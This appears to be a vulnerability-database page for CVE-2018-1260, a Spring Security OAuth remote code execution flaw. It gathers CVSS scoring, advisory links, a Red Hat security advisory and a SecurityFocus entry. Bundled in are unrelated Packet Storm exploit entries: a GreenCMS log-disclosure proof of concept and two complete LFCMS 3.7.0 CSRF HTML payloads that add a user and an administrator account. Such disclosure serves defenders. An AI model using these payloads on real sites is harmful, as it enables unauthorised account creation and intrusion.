CVE-2018-1260
CVSS 7.5
Published: 2018-05-11 16:29:00
Last revised: 2018-06-14 13:34:49

[Original] Spring Security OAuth, versions 2.3 prior to 2.3.3, 2.2 prior to 2.2.2, 2.1 prior to 2.1.2, 2.0 prior to 2.0.15 and older unsupported versions contains a remote code execution vulnerability. A malicious user or attacker can craft an authorization request to the authorization endpoint that can lead to remote code execution when the resource owner is forwarded to the approval endpoint.


[CNNVD] CNNVD data not yet available.


[Machine translation] Translation not yet available.

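- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: NETWORK [the attacker does not need internal network access or local access]
Authentication: NONE [exploitation requires no authentication]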

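- CWE (Weakness Category)

CWE-94 [Improper Control of Generation of Code (Code Injection)]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1260
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1260
(Official data source) NVD

- Other Links and Resources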

http://www.securityfocus.com/bid/104158
(VENDOR_ADVISORY)  BID  104158
https://access.redhat.com/errata/RHSA-2018:1809
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1809
https://pivotal.io/security/cve-2018-1260
(VENDOR_ADVISORY)  CONFIRM  https://pivotal.io/security/cve-2018-1260

- Vulnerability Information (F148079)

Red Hat Security Advisory 2018-1809-01 (PacketStormID:F148079)
2018-06-07 00:00:00
Red Hat  
advisory,denial of service,vulnerability,code execution
linux,redhat
CVE-2018-1257,CVE-2018-1259,CVE-2018-1260

Red Hat Security Advisory 2018-1809-01 - Red Hat Openshift Application Runtimes provides an application platform that reduces the complexity of developing and operating applications for OpenShift as a containerized platform. This release of RHOAR Spring Boot 1.5.13 serves as a replacement for RHOAR Spring Boot 1.5.12, and includes bug fixes and enhancements. For further information, refer to the Release Notes linked to in the References section. Issues addressed include code execution and denial of service vulnerabilities.

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Application Runtimes Spring Boot security and bug fix update
Advisory ID:       RHSA-2018:1809-01
Product:           Red Hat OpenShift Application Runtimes
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1809
Issue date:        2018-06-07
CVE Names:         CVE-2018-1257 CVE-2018-1259 CVE-2018-1260 
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift Application Runtimes.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift Application Runtimes provides an application platform
that reduces the complexity of developing and operating applications
(monoliths and microservices) for OpenShift as a containerized platform.

This release of RHOAR Spring Boot 1.5.13 serves as a replacement for RHOAR
Spring Boot 1.5.12, and includes bug fixes and enhancements. For further
information, refer to the Release Notes linked to in the References
section.

Security Fix(es):

* spring-messaging: ReDoS Attack with spring-messaging (CVE-2018-1257)

* spring-data: XXE with Spring Data's XMLBeam integration (CVE-2018-1259)

* spring-security-oauth2: Remote Code Execution with spring-security-oauth2
(CVE-2018-1260)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

3. Solution:

Before applying the update, back up your existing installation, including
all applications, configuration files, databases and database settings, and
so on.

The References section of this erratum contains a download link (you must
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

1578578 - CVE-2018-1257 spring-framework: ReDoS Attack with spring-messaging
1578902 - CVE-2018-1259 spring-data-commons: XXE with Spring Data's XMLBeam integration
1584376 - CVE-2018-1260 spring-security-oauth: remote code execution in the authorization process

5. References:

https://access.redhat.com/security/cve/CVE-2018-1257
https://access.redhat.com/security/cve/CVE-2018-1259
https://access.redhat.com/security/cve/CVE-2018-1260
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=catRhoar.spring.boot&downloadType=distributions&version=1.5.13
https://access.redhat.com/documentation/en-us/red_hat_openshift_application_runtimes/1/html-single/red_hat_openshift_application_runtimes_release_notes/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.

- Vulnerability Information (F148281)

GreenCMS 2.3.0603 Information Disclosure (PacketStormID:F148281)
2018-06-22 00:00:00
vr_system  
exploit,info disclosure
CVE-2018-12604

GreenCMS version 2.3.0603 suffers from a sensitive information disclosure vulnerability.

# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
# Date: 2018-06-21
# Exploit Author: vr_system
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
# Software Link: https://github.com/GreenCMS/GreenCMS/
# Version: GreenCMS 2.3.0603
# Tested on: windows 7
# CVE : CVE-2018-12604
 
# POC: http://site.com/Data/Log/year_month_day.log.
# Tested Link: 
http://site.com/GreenCMS-beta/Data/Log/18_06_20.log  
http://site.com/Data/Log/18_06_20.log


    

- Vulnerability Information (F148276)

LFCMS 3.7.0 Cross Site Request Forgery (PacketStormID:F148276)
2018-06-21 00:00:00
bay0net  
exploit,csrf
CVE-2018-12602

LFCMS version 3.7.0 suffers from an add user cross site request forgery vulnerability.

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602
 
 
A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
 
 
The payload for attack is as follows.
 
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

    

- Vulnerability Information (F148268)

LFCMS 3.7.0 Cross Site Request Forgery (PacketStormID:F148268)
2018-06-21 00:00:00
bay0net  
exploit,csrf
CVE-2018-12603

LFCMS version 3.7.0 suffers from an add administrator cross site request forgery vulnerability.

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12603
 
 
A CSRF vulnerability exists in LFCMS_3.7.0:  administrator account can be added arbitrarily.
 
 
The payload for attack is as follows.
 
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

    

- Vulnerability Information

Pivotal Spring Security OAuth CVE-2018-1260 Remote Code Execution Vulnerability
Class: Input Validation Error
Bugtraq ID: 104158
Remote: Yes
Local: No
Published: 2018-05-09 12:00:00
Updated: 2018-05-09 12:00:00
Credit: Philippe Arteau from GoSecure

- Affected Software Versions

Pivotal Spring Security OAuth 2.3.2
Pivotal Spring Security OAuth 2.2.1
Pivotal Spring Security OAuth 2.1.1
Pivotal Spring Security OAuth 2.0.14
Pivotal Spring Security OAuth 2.0.10
Pivotal Spring Security OAuth 2.0.9
Pivotal Spring Security OAuth 2.0.8
Pivotal Spring Security OAuth 2.0.7
Pivotal Spring Security OAuth 2.0.6
Pivotal Spring Security OAuth 2.0.5
Pivotal Spring Security OAuth 2.0.4
Pivotal Spring Security OAuth 2.0.3
Pivotal Spring Security OAuth 2.0.2
Pivotal Spring Security OAuth 2.0.1
Pivotal Spring Security OAuth 2.0
Pivotal Spring Security OAuth 1.0.5
Pivotal Spring Security OAuth 1.0.4
Pivotal Spring Security OAuth 1.0.3
Pivotal Spring Security OAuth 1.0.1
Pivotal Spring Security OAuth 1.0
Pivotal Spring Security OAuth 2.3
Pivotal Spring Security OAuth 2.2
Pivotal Spring Security OAuth 2.1

- Unaffected Software Versions

Pivotal Spring Security OAuth 2.3.3
Pivotal Spring Security OAuth 2.2.2
Pivotal Spring Security OAuth 2.1.2
Pivotal Spring Security OAuth 2.0.15

- Vulnerability Discussion

Pivotal Spring Security OAuth is prone to a remote code execution vulnerability.

Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.

The following versions are vulnerable:

Spring Security OAuth 2.3 through 2.3.2
Spring Security OAuth 2.2 through 2.2.1
Spring Security OAuth 2.1 through 2.1.1
Spring Security OAuth 2.0 through 2.0.14
Older unsupported versions

- Exploit

Currently, we are not aware of any working exploits. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

- References

 

 
